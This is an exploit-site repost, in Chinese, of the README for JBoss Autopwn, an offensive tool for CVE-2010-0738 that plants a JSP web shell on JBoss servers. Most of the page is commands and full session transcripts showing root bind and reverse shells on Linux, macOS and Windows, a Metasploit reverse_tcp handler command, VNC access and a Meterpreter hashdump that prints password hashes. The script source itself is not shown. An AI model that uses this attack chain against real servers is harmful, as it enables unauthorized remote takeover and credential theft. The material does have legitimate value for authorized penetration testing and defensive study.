Sploitus

Exploit for jboss-autopwn-1

kitploit · 2026-08-24

Exploit Code

MARKDOWN253 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-1872892142-JBOSS-AUTOPWN-1
# jboss-autopwn

在2010年BlackHat Europe上展示的JBoss Autopwn——该版本整合了CVE-2010-0738,即Minded Security发现的JBoss认证绕过VERB操控漏洞。

C. Papathanasiou 2010

# 介绍

该JBoss脚本在目标JBoss AS服务器上部署一个JSP shell。部署后,脚本利用其上传和执行命令的功能提供一个交互式会话。

功能包括:

  * 多平台支持——已在Windows、Linux和Mac目标上测试
  * 支持绑定shell和反向连接shell
  * Windows目标的Meterpreter shell和VNC支持



# 安装

依赖项包括

  * Netcat
  * Curl
  * Metasploit v3,需安装于当前路径下并命名为"framework3"



# 用法

对于使用bind_tcp和reverse_tcp的*nix目标,使用e.sh:

root@kitploit:~
    
    
    ./e.sh target_ip tcp_port
    

对于能够执行Metasploit Windows有效负载的Windows目标,使用e2.sh:

root@kitploit:~
    
    
    /e2.sh target_ip tcp_port
    

# 示例

Linux绑定shell:

root@kitploit:~
    
    
    [root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
    [x] Retrieving cookie
    [x] Now creating BSH script...
    [x] .war file created successfully in /tmp
    [x] Now deploying .war file:
    http://192.168.1.2:8080/browser/browser/browser.jsp
    [x] Running as user...:
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    [x] Server uname...:
     Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
    [!] Would you like to upload a reverse or a bind shell? bind
    [!] On which port would you like the bindshell to listen on? 31337
    [x] Uploading bind shell payload..
    [x] Verifying if upload was successful...
    -rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload
    [x] You should have a bind shell on 192.168.1.2:31337..
    [x] Dropping you into a shell...
    Connection to 192.168.1.2 31337 port [tcp/*] succeeded!
    id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    python -c 'import pty; pty.spawn("/bin/bash")'
    [root@nitrogen /]# full interactive shell :-)
    
    Linux反向shell:
    
    [root@nitrogen jboss]# nc -lv 31337 &
    [1] 15536
    [root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
    [x] Retrieving cookie
    [x] Now creating BSH script...
    [x] .war file created successfully in /tmp
    [x] Now deploying .war file:
    http://192.168.1.2:8080/browser/browser/browser.jsp
    [x] Running as user...:
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    [x] Server uname...:
     Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
    [!] Would you like to upload a reverse or a bind shell? reverse
    [!] On which port would you like to accept the reverse shell on? 31337
    [x] Uploading reverse shell payload..
    [x] Verifying if upload was successful...
    -rwxrwxrwx 1 root root 157 2009-11-22 19:49 /tmp/payload
    Connection from 192.168.1.2 port 31337 [tcp/*] accepted
    [x] You should have a reverse shell on localhost:31337..
    [root@nitrogen jboss]# jobs
    [1]+  Running                 nc -lv 31337 &
    [root@nitrogen jboss]# fg 1
    nc -lv 31337
    id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    python -c 'import pty; pty.spawn("/bin/bash")';
    [root@nitrogen /]# full interactive tty :-)
    full interactive tty :-)
    
    针对MacOS X(绑定shell):
    
    [root@nitrogen jboss]# ./e.sh 192.168.1.5 8080 2>/dev/null 
    [x] Retrieving cookie
    [x] Now creating BSH script...
    [x] .war file created successfully in /tmp
    [x] Now deploying .war file:
    http://192.168.1.5:8080/browser/browser/browser.jsp
    [x] Running as user...:
    uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2)
    [x] Server uname...:
     Darwin helium-2.tiscali.co.uk 9.7.1 Darwin Kernel Version 9.7.1: Thu Apr 23 13:52:18 PDT 2009; root:xnu-1228.14.1~1/RELEASE_I386 i386 
    [!] Would you like to upload a reverse or a bind shell? bind
    [!] On which port would you like the bindshell to listen on? 31337
    [x] Uploading bind shell payload..
    [x] Verifying if upload was successful...
    -rwxrwxrwx 1 root wheel 172 22 Nov 19:58 /tmp/payload
    [x] You should have a bind shell on 192.168.1.5:31337..
    [x] Dropping you into a shell...
    Connection to 192.168.1.5 31337 port [tcp/*] succeeded!
    id
    uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2)
    python -c 'import pty; pty.spawn("/bin/bash")'
    bash-3.2# id
    id
    uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2)
    bash-3.2# 
    
    反向shell同理。
    
    Windows绑定shell:
    
    [root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null
    [x] Retrieving cookie
    [x] Now creating BSH script...
    [x] .war file created succesfully on c:
    [x] Now deploying .war file:
    [x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp
    [x] Server name...:
            Host Name . . . . . . . . . . . . : aquarius
    [x] Would you like a reverse or bind shell or vnc(bind)? bind
    [x] On which port would you like your bindshell to listen? 31337
    [x] Uploading bindshell payload..
    [x] Checking that bind shell was uploaded correctly..
    [x] Bind shell uploaded: 22/11/2009  18:35            87,552 payload.exe
    [x] Now executing bind shell...
    [x] Executed bindshell!
    [x] Reverting to metasploit....
    [*] Started bind handler
    [*] Starting the payload handler...
    [*] Command shell session 1 opened (192.168.1.2:60535 -> 192.168.1.225:31337)
    
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.
    
    C:\Documents and Settings\chris\Desktop\jboss-4.2.3.GA\server\default\tmp\deploy\tmp8376972724011216327browserwin-exp.war>
    
    
    Windows反向shell,使用Metasploit meterpreter有效负载:
    
    [root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null
    [x] Retrieving cookie
    [x] Now creating BSH script...
    [x] .war file created successfully on c:
    [x] Now deploying .war file:
    [x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp
    [x] Server name...:
            Host Name . . . . . . . . . . . . : aquarius
    [x] Would you like a reverse or bind shell or vnc(bind)? reverse
    [x] On which port would you like to accept your reverse shell? 31337
    [x] Uploading reverseshell payload..
    [x] Checking that the reverse shell was uploaded correctly..
    [x] Reverse shell uploaded: 22/11/2009  18:46            87,552 payload.exe
    [x] You now have 20 seconds to launch metasploit before I send a reverse shell back.. ctrl-z, bg then type:
    framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E
    [x] Now executing reverse shell...
    [x] Executed reverse shell!
    [root@nitrogen jboss]#
    
    
    在终端2中:
    
    [root@nitrogen jboss]# framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E
    
    [*] Please wait while we load the module tree...
    [*] Started reverse handler on port 31337
    [*] Starting the payload handler...
    [*] Sending stage (719360 bytes)
    [*] Meterpreter session 1 opened (192.168.1.2:31337 -> 192.168.1.225:1266)
    
    meterpreter > use priv
    Loading extension priv...success.
    meterpreter > hashdump
    Administrator:500:xxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxx:::
    chris:1005:xxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1004:5cb061f95caf6a9dc7d1bb971b333632:4ac4ee4210529e17665db586df844736:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:293c804ee7b7f93b3919344842b9c98a:::
    __vmware_user__:1007:aad3b435b51404eeaad3b435b51404ee:a9fa3213d080de5533c7572775a149f5:::
    meterpreter >
    
    
    Windows VNC shell:
    
    [root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null
    [x] Retrieving cookie
    [x] Now creating BSH script...
    [x] .war file created successfully on c:
    [x] Now deploying .war file:
    [x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp
    [x] Server name...:
            Host Name . . . . . . . . . . . . : aquarius
    [x] Would you like a reverse or bind shell or vnc(bind)? vnc
    [x] On which port would you like your  vnc shell to listen? 21
    [x] Uploading vnc  shell payload..
    [x] Checking that vnc shell was uploaded correctly..
    [x] vnc shell uploaded: 22/11/2009  19:14            87,552 payload.exe
    [x] Now executing vnc  shell...
    [x] Executed  vnc shell!
    [x] Reverting to metasploit....
    [*] Started bind handler
    [*] Starting the payload handler...
    [*] Sending stage (197120 bytes)
    [*] Starting local TCP relay on 127.0.0.1:5900...
    [*] Local TCP relay started.
    [*] Launched vnciewer in the background.
    [*] VNC Server session 1 opened (192.168.1.2:52682 -> 192.168.1.225:21)
    
    [*] VNC connection closed.
    
    [root@nitrogen jboss]#
    
    >>VNC窗口在此处打开.. :-)
    
    

# 版权

JBoss Autopwn - 用于获取远程shell访问的JBoss脚本 创建者:Christian G. Papathanasiou 版权所有 (C) 2009-2011 Trustwave Holdings, Inc.

本程序为自由软件;您可以根据自由软件基金会发布的GNU通用公共许可证(许可证版本2或您选择的任何更高版本)重新分发和/或修改它。

分发本程序的目的是希望它有用,但**不提供任何担保** ;甚至没有适销性或特定用途适用性的暗示担保。更多细节请参阅GNU通用公共许可证。

您应该已经随本程序收到一份GNU通用公共许可证副本;如果没有,请写信至:Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA。